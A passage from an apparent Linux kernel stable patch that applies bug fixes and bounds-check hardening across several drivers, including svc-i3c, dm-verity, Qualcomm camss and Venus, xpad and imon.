++	writel(SVC_I3C_MINT_IBIWON, master->regs + SVC_I3C_MSTATUS);
++
+ 	writel(SVC_I3C_MCTRL_REQUEST_START_ADDR |
+ 	       xfer_type |
+ 	       SVC_I3C_MCTRL_IBIRESP_NACK |
+@@ -1012,6 +1038,11 @@ static int svc_i3c_master_xfer(struct svc_i3c_master *master,
+ 	if (ret)
+ 		goto emit_stop;
+ 
++	if (readl(master->regs + SVC_I3C_MERRWARN) & SVC_I3C_MERRWARN_NACK) {
++		ret = -ENXIO;
++		goto emit_stop;
++	}
++
+ 	if (rnw)
+ 		ret = svc_i3c_master_read(master, in, xfer_len);
+ 	else
+@@ -1019,6 +1050,23 @@ static int svc_i3c_master_xfer(struct svc_i3c_master *master,
+ 	if (ret < 0)
+ 		goto emit_stop;
+ 
++	/*
++	 * According to I3C spec ver 1.1.1, 5.1.2.2.3 Consequence of Controller Starting a Frame
++	 * with I3C Target Address.
++	 *
++	 * The I3C Controller normally should start a Frame, the Address may be arbitrated, and so
++	 * the Controller shall monitor to see whether an In-Band Interrupt request, a Controller
++	 * Role Request (i.e., Secondary Controller requests to become the Active Controller), or
++	 * a Hot-Join Request has been made.
++	 *
++	 * If missed IBIWON check, the wrong data will be return. When IBIWON happen, return failure
++	 * and yield the above events handler.
++	 */
++	if (SVC_I3C_MSTATUS_IBIWON(reg)) {
++		ret = -ENXIO;
++		goto emit_stop;
++	}
++
+ 	if (rnw)
+ 		*read_len = ret;
+ 
+@@ -1191,9 +1239,11 @@ static int svc_i3c_master_send_bdcast_ccc_cmd(struct svc_i3c_master *master,
+ 	cmd->read_len = 0;
+ 	cmd->continued = false;
+ 
++	mutex_lock(&master->lock);
+ 	svc_i3c_master_enqueue_xfer(master, xfer);
+ 	if (!wait_for_completion_timeout(&xfer->comp, msecs_to_jiffies(1000)))
+ 		svc_i3c_master_dequeue_xfer(master, xfer);
++	mutex_unlock(&master->lock);
+ 
+ 	ret = xfer->ret;
+ 	kfree(buf);
+@@ -1237,9 +1287,11 @@ static int svc_i3c_master_send_direct_ccc_cmd(struct svc_i3c_master *master,
+ 	cmd->read_len = read_len;
+ 	cmd->continued = false;
+ 
++	mutex_lock(&master->lock);
+ 	svc_i3c_master_enqueue_xfer(master, xfer);
+ 	if (!wait_for_completion_timeout(&xfer->comp, msecs_to_jiffies(1000)))
+ 		svc_i3c_master_dequeue_xfer(master, xfer);
++	mutex_unlock(&master->lock);
+ 
+ 	if (cmd->read_len != xfer_len)
+ 		ccc->dests[0].payload.len = cmd->read_len;
+@@ -1296,9 +1348,11 @@ static int svc_i3c_master_priv_xfers(struct i3c_dev_desc *dev,
+ 		cmd->continued = (i + 1) < nxfers;
+ 	}
+ 
++	mutex_lock(&master->lock);
+ 	svc_i3c_master_enqueue_xfer(master, xfer);
+ 	if (!wait_for_completion_timeout(&xfer->comp, msecs_to_jiffies(1000)))
+ 		svc_i3c_master_dequeue_xfer(master, xfer);
++	mutex_unlock(&master->lock);
+ 
+ 	ret = xfer->ret;
+ 	svc_i3c_master_free_xfer(xfer);
+@@ -1334,9 +1388,11 @@ static int svc_i3c_master_i2c_xfers(struct i2c_dev_desc *dev,
+ 		cmd->continued = (i + 1 < nxfers);
+ 	}
+ 
++	mutex_lock(&master->lock);
+ 	svc_i3c_master_enqueue_xfer(master, xfer);
+ 	if (!wait_for_completion_timeout(&xfer->comp, msecs_to_jiffies(1000)))
+ 		svc_i3c_master_dequeue_xfer(master, xfer);
++	mutex_unlock(&master->lock);
+ 
+ 	ret = xfer->ret;
+ 	svc_i3c_master_free_xfer(xfer);
+@@ -1527,6 +1583,8 @@ static int svc_i3c_master_probe(struct platform_device *pdev)
+ 
+ 	INIT_WORK(&master->hj_work, svc_i3c_master_hj_work);
+ 	INIT_WORK(&master->ibi_work, svc_i3c_master_ibi_work);
++	mutex_init(&master->lock);
++
+ 	ret = devm_request_irq(dev, master->irq, svc_i3c_master_irq_handler,
+ 			       IRQF_NO_SUSPEND, "svc-i3c-irq", master);
+ 	if (ret)
+diff --git a/drivers/iio/adc/stm32-adc-core.c b/drivers/iio/adc/stm32-adc-core.c
+index 81d5db91c67bf..dee47b899e5df 100644
+--- a/drivers/iio/adc/stm32-adc-core.c
++++ b/drivers/iio/adc/stm32-adc-core.c
+@@ -695,6 +695,8 @@ static int stm32_adc_probe(struct platform_device *pdev)
+ 	struct stm32_adc_priv *priv;
+ 	struct device *dev = &pdev->dev;
+ 	struct device_node *np = pdev->dev.of_node;
++	const struct of_device_id *of_id;
++
+ 	struct resource *res;
+ 	u32 max_rate;
+ 	int ret;
+@@ -707,8 +709,11 @@ static int stm32_adc_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 	platform_set_drvdata(pdev, &priv->common);
+ 
+-	priv->cfg = (const struct stm32_adc_priv_cfg *)
+-		of_match_device(dev->driver->of_match_table, dev)->data;
++	of_id = of_match_device(dev->driver->of_match_table, dev);
++	if (!of_id)
++		return -ENODEV;
++
++	priv->cfg = (const struct stm32_adc_priv_cfg *)of_id->data;
+ 	priv->nb_adc_max = priv->cfg->num_adcs;
+ 	spin_lock_init(&priv->common.lock);
+ 
+diff --git a/drivers/infiniband/hw/hfi1/pcie.c b/drivers/infiniband/hw/hfi1/pcie.c
+index a0802332c8cb3..5395cf56fbd90 100644
+--- a/drivers/infiniband/hw/hfi1/pcie.c
++++ b/drivers/infiniband/hw/hfi1/pcie.c
+@@ -3,6 +3,7 @@
+  * Copyright(c) 2015 - 2019 Intel Corporation.
+  */
+ 
++#include <linux/bitfield.h>
+ #include <linux/pci.h>
+ #include <linux/io.h>
+ #include <linux/delay.h>
+@@ -212,12 +213,6 @@ static u32 extract_speed(u16 linkstat)
+ 	return speed;
+ }
+ 
+-/* return the PCIe link speed from the given link status */
+-static u32 extract_width(u16 linkstat)
+-{
+-	return (linkstat & PCI_EXP_LNKSTA_NLW) >> PCI_EXP_LNKSTA_NLW_SHIFT;
+-}
+-
+ /* read the link status and set dd->{lbus_width,lbus_speed,lbus_info} */
+ static void update_lbus_info(struct hfi1_devdata *dd)
+ {
+@@ -230,7 +225,7 @@ static void update_lbus_info(struct hfi1_devdata *dd)
+ 		return;
+ 	}
+ 
+-	dd->lbus_width = extract_width(linkstat);
++	dd->lbus_width = FIELD_GET(PCI_EXP_LNKSTA_NLW, linkstat);
+ 	dd->lbus_speed = extract_speed(linkstat);
+ 	snprintf(dd->lbus_info, sizeof(dd->lbus_info),
+ 		 "PCIe,%uMHz,x%u", dd->lbus_speed, dd->lbus_width);
+diff --git a/drivers/input/joystick/xpad.c b/drivers/input/joystick/xpad.c
+index c19a4d2023805..fc6957fddce8e 100644
+--- a/drivers/input/joystick/xpad.c
++++ b/drivers/input/joystick/xpad.c
+@@ -474,6 +474,7 @@ static const struct usb_device_id xpad_table[] = {
+ 	XPAD_XBOX360_VENDOR(0x0f0d),		/* Hori Controllers */
+ 	XPAD_XBOXONE_VENDOR(0x0f0d),		/* Hori Controllers */
+ 	XPAD_XBOX360_VENDOR(0x1038),		/* SteelSeries Controllers */
++	XPAD_XBOXONE_VENDOR(0x10f5),		/* Turtle Beach Controllers */
+ 	XPAD_XBOX360_VENDOR(0x11c9),		/* Nacon GC100XF */
+ 	XPAD_XBOX360_VENDOR(0x11ff),		/* PXN V900 */
+ 	XPAD_XBOX360_VENDOR(0x1209),		/* Ardwiino Controllers */
+diff --git a/drivers/mcb/mcb-core.c b/drivers/mcb/mcb-core.c
+index e7b6989d8b4a8..a6b4ccc314cac 100644
+--- a/drivers/mcb/mcb-core.c
++++ b/drivers/mcb/mcb-core.c
+@@ -246,6 +246,7 @@ int mcb_device_register(struct mcb_bus *bus, struct mcb_device *dev)
+ 	return 0;
+ 
+ out:
++	put_device(&dev->dev);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/mcb/mcb-parse.c b/drivers/mcb/mcb-parse.c
+index 656b6b71c7682..1ae37e693de04 100644
+--- a/drivers/mcb/mcb-parse.c
++++ b/drivers/mcb/mcb-parse.c
+@@ -106,7 +106,7 @@ static int chameleon_parse_gdd(struct mcb_bus *bus,
+ 	return 0;
+ 
+ err:
+-	put_device(&mdev->dev);
++	mcb_free_dev(mdev);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/md/dm-verity-fec.c b/drivers/md/dm-verity-fec.c
+index 962fc32c947c5..9eb03bb224698 100644
+--- a/drivers/md/dm-verity-fec.c
++++ b/drivers/md/dm-verity-fec.c
+@@ -185,7 +185,7 @@ static int fec_is_erasure(struct dm_verity *v, struct dm_verity_io *io,
+ {
+ 	if (unlikely(verity_hash(v, verity_io_hash_req(v, io),
+ 				 data, 1 << v->data_dev_block_bits,
+-				 verity_io_real_digest(v, io))))
++				 verity_io_real_digest(v, io), true)))
+ 		return 0;
+ 
+ 	return memcmp(verity_io_real_digest(v, io), want_digest,
+@@ -386,7 +386,7 @@ static int fec_decode_rsb(struct dm_verity *v, struct dm_verity_io *io,
+ 	/* Always re-validate the corrected block against the expected hash */
+ 	r = verity_hash(v, verity_io_hash_req(v, io), fio->output,
+ 			1 << v->data_dev_block_bits,
+-			verity_io_real_digest(v, io));
++			verity_io_real_digest(v, io), true);
+ 	if (unlikely(r < 0))
+ 		return r;
+ 
+diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
+index 14a9988ec30ba..b86d41219ba9c 100644
+--- a/drivers/md/dm-verity-target.c
++++ b/drivers/md/dm-verity-target.c
+@@ -132,20 +132,21 @@ static int verity_hash_update(struct dm_verity *v, struct ahash_request *req,
+  * Wrapper for crypto_ahash_init, which handles verity salting.
+  */
+ static int verity_hash_init(struct dm_verity *v, struct ahash_request *req,
+-				struct crypto_wait *wait)
++				struct crypto_wait *wait, bool may_sleep)
+ {
+ 	int r;
+ 
+ 	ahash_request_set_tfm(req, v->tfm);
+-	ahash_request_set_callback(req, CRYPTO_TFM_REQ_MAY_SLEEP |
+-					CRYPTO_TFM_REQ_MAY_BACKLOG,
+-					crypto_req_done, (void *)wait);
++	ahash_request_set_callback(req,
++		may_sleep ? CRYPTO_TFM_REQ_MAY_SLEEP | CRYPTO_TFM_REQ_MAY_BACKLOG : 0,
++		crypto_req_done, (void *)wait);
+ 	crypto_init_wait(wait);
+ 
+ 	r = crypto_wait_req(crypto_ahash_init(req), wait);
+ 
+ 	if (unlikely(r < 0)) {
+-		DMERR("crypto_ahash_init failed: %d", r);
++		if (r != -ENOMEM)
++			DMERR("crypto_ahash_init failed: %d", r);
+ 		return r;
+ 	}
+ 
+@@ -176,12 +177,12 @@ out:
+ }
+ 
+ int verity_hash(struct dm_verity *v, struct ahash_request *req,
+-		const u8 *data, size_t len, u8 *digest)
++		const u8 *data, size_t len, u8 *digest, bool may_sleep)
+ {
+ 	int r;
+ 	struct crypto_wait wait;
+ 
+-	r = verity_hash_init(v, req, &wait);
++	r = verity_hash_init(v, req, &wait, may_sleep);
+ 	if (unlikely(r < 0))
+ 		goto out;
+ 
+@@ -317,7 +318,7 @@ static int verity_verify_level(struct dm_verity *v, struct dm_verity_io *io,
+ 
+ 		r = verity_hash(v, verity_io_hash_req(v, io),
+ 				data, 1 << v->hash_dev_block_bits,
+-				verity_io_real_digest(v, io));
++				verity_io_real_digest(v, io), !io->in_tasklet);
+ 		if (unlikely(r < 0))
+ 			goto release_ret_r;
+ 
+@@ -548,7 +549,7 @@ static int verity_verify_io(struct dm_verity_io *io)
+ 			continue;
+ 		}
+ 
+-		r = verity_hash_init(v, req, &wait);
++		r = verity_hash_init(v, req, &wait, !io->in_tasklet);
+ 		if (unlikely(r < 0))
+ 			return r;
+ 
+@@ -641,7 +642,7 @@ static void verity_tasklet(unsigned long data)
+ 
+ 	io->in_tasklet = true;
+ 	err = verity_verify_io(io);
+-	if (err == -EAGAIN) {
++	if (err == -EAGAIN || err == -ENOMEM) {
+ 		/* fallback to retrying with work-queue */
+ 		INIT_WORK(&io->work, verity_work);
+ 		queue_work(io->v->verify_wq, &io->work);
+@@ -1018,7 +1019,7 @@ static int verity_alloc_zero_digest(struct dm_verity *v)
+ 		goto out;
+ 
+ 	r = verity_hash(v, req, zero_data, 1 << v->data_dev_block_bits,
+-			v->zero_digest);
++			v->zero_digest, true);
+ 
+ out:
+ 	kfree(req);
+diff --git a/drivers/md/dm-verity.h b/drivers/md/dm-verity.h
+index 2f555b4203679..f96f4e281ee4a 100644
+--- a/drivers/md/dm-verity.h
++++ b/drivers/md/dm-verity.h
+@@ -128,7 +128,7 @@ extern int verity_for_bv_block(struct dm_verity *v, struct dm_verity_io *io,
+ 					      u8 *data, size_t len));
+ 
+ extern int verity_hash(struct dm_verity *v, struct ahash_request *req,
+-		       const u8 *data, size_t len, u8 *digest);
++		       const u8 *data, size_t len, u8 *digest, bool may_sleep);
+ 
+ extern int verity_hash_for_block(struct dm_verity *v, struct dm_verity_io *io,
+ 				 sector_t block, u8 *digest, bool *is_zero);
+diff --git a/drivers/media/i2c/ccs/ccs-core.c b/drivers/media/i2c/ccs/ccs-core.c
+index 4a14d7e5d9f25..5fdb922d24e05 100644
+--- a/drivers/media/i2c/ccs/ccs-core.c
++++ b/drivers/media/i2c/ccs/ccs-core.c
+@@ -3088,7 +3088,7 @@ static int ccs_open(struct v4l2_subdev *sd, struct v4l2_subdev_fh *fh)
+ 		try_fmt->code = sensor->internal_csi_format->code;
+ 		try_fmt->field = V4L2_FIELD_NONE;
+ 
+-		if (ssd != sensor->pixel_array)
++		if (ssd == sensor->pixel_array)
+ 			continue;
+ 
+ 		try_comp = v4l2_subdev_get_try_compose(sd, fh->state, i);
+diff --git a/drivers/media/i2c/ccs/ccs-quirk.h b/drivers/media/i2c/ccs/ccs-quirk.h
+index 5838fcda92fd4..0b1a64958d714 100644
+--- a/drivers/media/i2c/ccs/ccs-quirk.h
++++ b/drivers/media/i2c/ccs/ccs-quirk.h
+@@ -32,12 +32,10 @@ struct ccs_sensor;
+  *		@reg: Pointer to the register to access
+  *		@value: Register value, set by the caller on write, or
+  *			by the quirk on read
+- *
+- * @flags: Quirk flags
+- *
+  *		@return: 0 on success, -ENOIOCTLCMD if no register
+  *			 access may be done by the caller (default read
+  *			 value is zero), else negative error code on error
++ * @flags: Quirk flags
+  */
+ struct ccs_quirk {
+ 	int (*limits)(struct ccs_sensor *sensor);
+diff --git a/drivers/media/pci/cobalt/cobalt-driver.c b/drivers/media/pci/cobalt/cobalt-driver.c
+index 74edcc76d12f4..6e1a0614e6d06 100644
+--- a/drivers/media/pci/cobalt/cobalt-driver.c
++++ b/drivers/media/pci/cobalt/cobalt-driver.c
+@@ -8,6 +8,7 @@
+  *  All rights reserved.
+  */
+ 
++#include <linux/bitfield.h>
+ #include <linux/delay.h>
+ #include <media/i2c/adv7604.h>
+ #include <media/i2c/adv7842.h>
+@@ -210,17 +211,17 @@ void cobalt_pcie_status_show(struct cobalt *cobalt)
+ 	pcie_capability_read_word(pci_dev, PCI_EXP_LNKSTA, &stat);
+ 	cobalt_info("PCIe link capability 0x%08x: %s per lane and %u lanes\n",
+ 			capa, get_link_speed(capa),
+-			(capa & PCI_EXP_LNKCAP_MLW) >> 4);
++			FIELD_GET(PCI_EXP_LNKCAP_MLW, capa));
+ 	cobalt_info("PCIe link control 0x%04x\n", ctrl);
+ 	cobalt_info("PCIe link status 0x%04x: %s per lane and %u lanes\n",
+ 		    stat, get_link_speed(stat),
+-		    (stat & PCI_EXP_LNKSTA_NLW) >> 4);
++		    FIELD_GET(PCI_EXP_LNKSTA_NLW, stat));
+ 
+ 	/* Bus */
+ 	pcie_capability_read_dword(pci_bus_dev, PCI_EXP_LNKCAP, &capa);
+ 	cobalt_info("PCIe bus link capability 0x%08x: %s per lane and %u lanes\n",
+ 			capa, get_link_speed(capa),
+-			(capa & PCI_EXP_LNKCAP_MLW) >> 4);
++			FIELD_GET(PCI_EXP_LNKCAP_MLW, capa));
+ 
+ 	/* Slot */
+ 	pcie_capability_read_dword(pci_dev, PCI_EXP_SLTCAP, &capa);
+@@ -239,7 +240,7 @@ static unsigned pcie_link_get_lanes(struct cobalt *cobalt)
+ 	if (!pci_is_pcie(pci_dev))
+ 		return 0;
+ 	pcie_capability_read_word(pci_dev, PCI_EXP_LNKSTA, &link);
+-	return (link & PCI_EXP_LNKSTA_NLW) >> 4;
++	return FIELD_GET(PCI_EXP_LNKSTA_NLW, link);
+ }
+ 
+ static unsigned pcie_bus_link_get_lanes(struct cobalt *cobalt)
+@@ -250,7 +251,7 @@ static unsigned pcie_bus_link_get_lanes(struct cobalt *cobalt)
+ 	if (!pci_is_pcie(pci_dev))
+ 		return 0;
+ 	pcie_capability_read_dword(pci_dev, PCI_EXP_LNKCAP, &link);
+-	return (link & PCI_EXP_LNKCAP_MLW) >> 4;
++	return FIELD_GET(PCI_EXP_LNKCAP_MLW, link);
+ }
+ 
+ static void msi_config_show(struct cobalt *cobalt, struct pci_dev *pci_dev)
+diff --git a/drivers/media/platform/qcom/camss/camss-csid-gen2.c b/drivers/media/platform/qcom/camss/camss-csid-gen2.c
+index 2031bde13a939..904208f6f9546 100644
+--- a/drivers/media/platform/qcom/camss/camss-csid-gen2.c
++++ b/drivers/media/platform/qcom/camss/camss-csid-gen2.c
+@@ -355,9 +355,6 @@ static void csid_configure_stream(struct csid_device *csid, u8 enable)
+ 		u8 dt_id = vc * 4;
+ 
+ 		if (tg->enabled) {
+-			/* Config Test Generator */
+-			vc = 0xa;
+-
+ 			/* configure one DT, infinite frames */
+ 			val = vc << TPG_VC_CFG0_VC_NUM;
+ 			val |= INTELEAVING_MODE_ONE_SHOT << TPG_VC_CFG0_LINE_INTERLEAVING_MODE;
+@@ -370,14 +367,14 @@ static void csid_configure_stream(struct csid_device *csid, u8 enable)
+ 
+ 			writel_relaxed(0x12345678, csid->base + CSID_TPG_LFSR_SEED);
+ 
+-			val = input_format->height & 0x1fff << TPG_DT_n_CFG_0_FRAME_HEIGHT;
+-			val |= input_format->width & 0x1fff << TPG_DT_n_CFG_0_FRAME_WIDTH;
++			val = (input_format->height & 0x1fff) << TPG_DT_n_CFG_0_FRAME_HEIGHT;
++			val |= (input_format->width & 0x1fff) << TPG_DT_n_CFG_0_FRAME_WIDTH;
+ 			writel_relaxed(val, csid->base + CSID_TPG_DT_n_CFG_0(0));
+ 
+ 			val = format->data_type << TPG_DT_n_CFG_1_DATA_TYPE;
+ 			writel_relaxed(val, csid->base + CSID_TPG_DT_n_CFG_1(0));
+ 
+-			val = tg->mode << TPG_DT_n_CFG_2_PAYLOAD_MODE;
++			val = (tg->mode - 1) << TPG_DT_n_CFG_2_PAYLOAD_MODE;
+ 			val |= 0xBE << TPG_DT_n_CFG_2_USER_SPECIFIED_PAYLOAD;
+ 			val |= format->decode_format << TPG_DT_n_CFG_2_ENCODE_FORMAT;
+ 			writel_relaxed(val, csid->base + CSID_TPG_DT_n_CFG_2(0));
+diff --git a/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c b/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c
+index 04baa80494c66..4dba61b8d3f2a 100644
+--- a/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c
++++ b/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c
+@@ -476,7 +476,7 @@ static void csiphy_lanes_enable(struct csiphy_device *csiphy,
+ 
+ 	settle_cnt = csiphy_settle_cnt_calc(link_freq, csiphy->timer_clk_rate);
+ 
+-	val = is_gen2 ? BIT(7) : CSIPHY_3PH_CMN_CSI_COMMON_CTRL5_CLK_ENABLE;
++	val = CSIPHY_3PH_CMN_CSI_COMMON_CTRL5_CLK_ENABLE;
+ 	for (i = 0; i < c->num_data; i++)
+ 		val |= BIT(c->data[i].pos * 2);
+ 
+diff --git a/drivers/media/platform/qcom/camss/camss-vfe-170.c b/drivers/media/platform/qcom/camss/camss-vfe-170.c
+index 600150cfc4f70..07b64d257512c 100644
+--- a/drivers/media/platform/qcom/camss/camss-vfe-170.c
++++ b/drivers/media/platform/qcom/camss/camss-vfe-170.c
+@@ -7,7 +7,6 @@
+  * Copyright (C) 2020-2021 Linaro Ltd.
+  */
+ 
+-#include <linux/delay.h>
+ #include <linux/interrupt.h>
+ #include <linux/io.h>
+ #include <linux/iopoll.h>
+@@ -494,35 +493,20 @@ static int vfe_enable_output(struct vfe_line *line)
+ 	return 0;
+ }
+ 
+-static int vfe_disable_output(struct vfe_line *line)
++static void vfe_disable_output(struct vfe_line *line)
+ {
+ 	struct vfe_device *vfe = to_vfe(line);
+ 	struct vfe_output *output = &line->output;
+ 	unsigned long flags;
+ 	unsigned int i;
+-	bool done;
+-	int timeout = 0;
+-
+-	do {
+-		spin_lock_irqsave(&vfe->output_lock, flags);
+-		done = !output->gen2.active_num;
+-		spin_unlock_irqrestore(&vfe->output_lock, flags);
+-		usleep_range(10000, 20000);
+-
+-		if (timeout++ == 100) {
+-			dev_err(vfe->camss->dev, "VFE idle timeout - resetting\n");
+-			vfe_reset(vfe);
+-			output->gen2.active_num = 0;
+-			return 0;
+-		}
+-	} while (!done);
+ 
+ 	spin_lock_irqsave(&vfe->output_lock, flags);
+ 	for (i = 0; i < output->wm_num; i++)
+ 		vfe_wm_stop(vfe, output->wm_idx[i]);
++	output->gen2.active_num = 0;
+ 	spin_unlock_irqrestore(&vfe->output_lock, flags);
+ 
+-	return 0;
++	vfe_reset(vfe);
+ }
+ 
+ /*
+diff --git a/drivers/media/platform/qcom/camss/camss-vfe-480.c b/drivers/media/platform/qcom/camss/camss-vfe-480.c
+index 1295851103931..ab42600f7a745 100644
+--- a/drivers/media/platform/qcom/camss/camss-vfe-480.c
++++ b/drivers/media/platform/qcom/camss/camss-vfe-480.c
+@@ -8,7 +8,6 @@
+  * Copyright (C) 2021 Jonathan Marek
+  */
+ 
+-#include <linux/delay.h>
+ #include <linux/interrupt.h>
+ #include <linux/io.h>
+ #include <linux/iopoll.h>
+@@ -311,35 +310,20 @@ static int vfe_enable_output(struct vfe_line *line)
+ 	return 0;
+ }
+ 
+-static int vfe_disable_output(struct vfe_line *line)
++static void vfe_disable_output(struct vfe_line *line)
+ {
+ 	struct vfe_device *vfe = to_vfe(line);
+ 	struct vfe_output *output = &line->output;
+ 	unsigned long flags;
+ 	unsigned int i;
+-	bool done;
+-	int timeout = 0;
+-
+-	do {
+-		spin_lock_irqsave(&vfe->output_lock, flags);
+-		done = !output->gen2.active_num;
+-		spin_unlock_irqrestore(&vfe->output_lock, flags);
+-		usleep_range(10000, 20000);
+-
+-		if (timeout++ == 100) {
+-			dev_err(vfe->camss->dev, "VFE idle timeout - resetting\n");
+-			vfe_reset(vfe);
+-			output->gen2.active_num = 0;
+-			return 0;
+-		}
+-	} while (!done);
+ 
+ 	spin_lock_irqsave(&vfe->output_lock, flags);
+ 	for (i = 0; i < output->wm_num; i++)
+ 		vfe_wm_stop(vfe, output->wm_idx[i]);
++	output->gen2.active_num = 0;
+ 	spin_unlock_irqrestore(&vfe->output_lock, flags);
+ 
+-	return 0;
++	vfe_reset(vfe);
+ }
+ 
+ /*
+diff --git a/drivers/media/platform/qcom/camss/camss-vfe.c b/drivers/media/platform/qcom/camss/camss-vfe.c
+index d8cd9b09c20de..ee4d7dccefe16 100644
+--- a/drivers/media/platform/qcom/camss/camss-vfe.c
++++ b/drivers/media/platform/qcom/camss/camss-vfe.c
+@@ -535,7 +535,8 @@ static int vfe_check_clock_rates(struct vfe_device *vfe)
+ 		struct camss_clock *clock = &vfe->clock[i];
+ 
+ 		if (!strcmp(clock->name, "vfe0") ||
+-		    !strcmp(clock->name, "vfe1")) {
++		    !strcmp(clock->name, "vfe1") ||
++		    !strcmp(clock->name, "vfe_lite")) {
+ 			u64 min_rate = 0;
+ 			unsigned long rate;
+ 
+@@ -611,7 +612,7 @@ int vfe_get(struct vfe_device *vfe)
+ 	} else {
+ 		ret = vfe_check_clock_rates(vfe);
+ 		if (ret < 0)
+-			goto error_pm_runtime_get;
++			goto error_pm_domain;
+ 	}
+ 	vfe->power_count++;
+ 
+diff --git a/drivers/media/platform/qcom/camss/camss.c b/drivers/media/platform/qcom/camss/camss.c
+index a157cac72e0ab..5057b2c4cf6c4 100644
+--- a/drivers/media/platform/qcom/camss/camss.c
++++ b/drivers/media/platform/qcom/camss/camss.c
+@@ -1624,6 +1624,12 @@ static int camss_probe(struct platform_device *pdev)
+ 	if (ret < 0)
+ 		goto err_cleanup;
+ 
++	ret = camss_configure_pd(camss);
++	if (ret < 0) {
++		dev_err(dev, "Failed to configure power domains: %d\n", ret);
++		goto err_cleanup;
++	}
++
+ 	ret = camss_init_subdevices(camss);
+ 	if (ret < 0)
+ 		goto err_cleanup;
+@@ -1676,12 +1682,6 @@ static int camss_probe(struct platform_device *pdev)
+ 		}
+ 	}
+ 
+-	ret = camss_configure_pd(camss);
+-	if (ret < 0) {
+-		dev_err(dev, "Failed to configure power domains: %d\n", ret);
+-		return ret;
+-	}
+-
+ 	pm_runtime_enable(dev);
+ 
+ 	return 0;
+diff --git a/drivers/media/platform/qcom/venus/hfi_msgs.c b/drivers/media/platform/qcom/venus/hfi_msgs.c
+index df96db3761a72..1c5cc5a5f89a6 100644
+--- a/drivers/media/platform/qcom/venus/hfi_msgs.c
++++ b/drivers/media/platform/qcom/venus/hfi_msgs.c
+@@ -374,7 +374,7 @@ session_get_prop_buf_req(struct hfi_msg_session_property_info_pkt *pkt,
+ 		memcpy(&bufreq[idx], buf_req, sizeof(*bufreq));
+ 		idx++;
+ 
+-		if (idx > HFI_BUFFER_TYPE_MAX)
++		if (idx >= HFI_BUFFER_TYPE_MAX)
+ 			return HFI_ERR_SESSION_INVALID_PARAMETER;
+ 
+ 		req_bytes -= sizeof(struct hfi_buffer_requirements);
+diff --git a/drivers/media/platform/qcom/venus/hfi_parser.c b/drivers/media/platform/qcom/venus/hfi_parser.c
+index 6cf74b2bc5ae3..c43839539d4dd 100644
+--- a/drivers/media/platform/qcom/venus/hfi_parser.c
++++ b/drivers/media/platform/qcom/venus/hfi_parser.c
+@@ -19,6 +19,9 @@ static void init_codecs(struct venus_core *core)
+ 	struct hfi_plat_caps *caps = core->caps, *cap;
+ 	unsigned long bit;
+ 
++	if (hweight_long(core->dec_codecs) + hweight_long(core->enc_codecs) > MAX_CODEC_NUM)
++		return;
++
+ 	for_each_set_bit(bit, &core->dec_codecs, MAX_CODEC_NUM) {
+ 		cap = &caps[core->codecs_count++];
+ 		cap->codec = BIT(bit);
+@@ -86,6 +89,9 @@ static void fill_profile_level(struct hfi_plat_caps *cap, const void *data,
+ {
+ 	const struct hfi_profile_level *pl = data;
+ 
++	if (cap->num_pl + num >= HFI_MAX_PROFILE_COUNT)
++		return;
++
+ 	memcpy(&cap->pl[cap->num_pl], pl, num * sizeof(*pl));
+ 	cap->num_pl += num;
+ }
+@@ -111,6 +117,9 @@ fill_caps(struct hfi_plat_caps *cap, const void *data, unsigned int num)
+ {
+ 	const struct hfi_capability *caps = data;
+ 
++	if (cap->num_caps + num >= MAX_CAP_ENTRIES)
++		return;
++
+ 	memcpy(&cap->caps[cap->num_caps], caps, num * sizeof(*caps));
+ 	cap->num_caps += num;
+ }
+@@ -137,6 +146,9 @@ static void fill_raw_fmts(struct hfi_plat_caps *cap, const void *fmts,
+ {
+ 	const struct raw_formats *formats = fmts;
+ 
++	if (cap->num_fmts + num_fmts >= MAX_FMT_ENTRIES)
++		return;
++
+ 	memcpy(&cap->fmts[cap->num_fmts], formats, num_fmts * sizeof(*formats));
+ 	cap->num_fmts += num_fmts;
+ }
+@@ -159,6 +171,9 @@ parse_raw_formats(struct venus_core *core, u32 codecs, u32 domain, void *data)
+ 		rawfmts[i].buftype = fmt->buffer_type;
+ 		i++;
+ 
++		if (i >= MAX_FMT_ENTRIES)
++			return;
++
+ 		if (pinfo->num_planes > MAX_PLANES)
+ 			break;
+ 
+diff --git a/drivers/media/platform/qcom/venus/hfi_venus.c b/drivers/media/platform/qcom/venus/hfi_venus.c
+index 8fc8f46dc3908..d46938aab26b7 100644
+--- a/drivers/media/platform/qcom/venus/hfi_venus.c
++++ b/drivers/media/platform/qcom/venus/hfi_venus.c
+@@ -205,6 +205,11 @@ static int venus_write_queue(struct venus_hfi_device *hdev,
+ 
+ 	new_wr_idx = wr_idx + dwords;
+ 	wr_ptr = (u32 *)(queue->qmem.kva + (wr_idx << 2));
++
++	if (wr_ptr < (u32 *)queue->qmem.kva ||
++	    wr_ptr > (u32 *)(queue->qmem.kva + queue->qmem.size - sizeof(*wr_ptr)))
++		return -EINVAL;
++
+ 	if (new_wr_idx < qsize) {
+ 		memcpy(wr_ptr, packet, dwords << 2);
+ 	} else {
+@@ -272,6 +277,11 @@ static int venus_read_queue(struct venus_hfi_device *hdev,
+ 	}
+ 
+ 	rd_ptr = (u32 *)(queue->qmem.kva + (rd_idx << 2));
++
++	if (rd_ptr < (u32 *)queue->qmem.kva ||
++	    rd_ptr > (u32 *)(queue->qmem.kva + queue->qmem.size - sizeof(*rd_ptr)))
++		return -EINVAL;
++
+ 	dwords = *rd_ptr >> 2;
+ 	if (!dwords)
+ 		return -EINVAL;
+diff --git a/drivers/media/rc/imon.c b/drivers/media/rc/imon.c
+index 74546f7e34691..5719dda6e0f0e 100644
+--- a/drivers/media/rc/imon.c
++++ b/drivers/media/rc/imon.c
+@@ -2427,6 +2427,12 @@ static int imon_probe(struct usb_interface *interface,
+ 		goto fail;
+ 	}
+ 
++	if (first_if->dev.driver != interface->dev.driver) {
++		dev_err(&interface->dev, "inconsistent driver matching\n");
++		ret = -EINVAL;
++		goto fail;
++	}
++
+ 	if (ifnum == 0) {
+ 		ictx = imon_init_intf0(interface, id);
+ 		if (!ictx) {
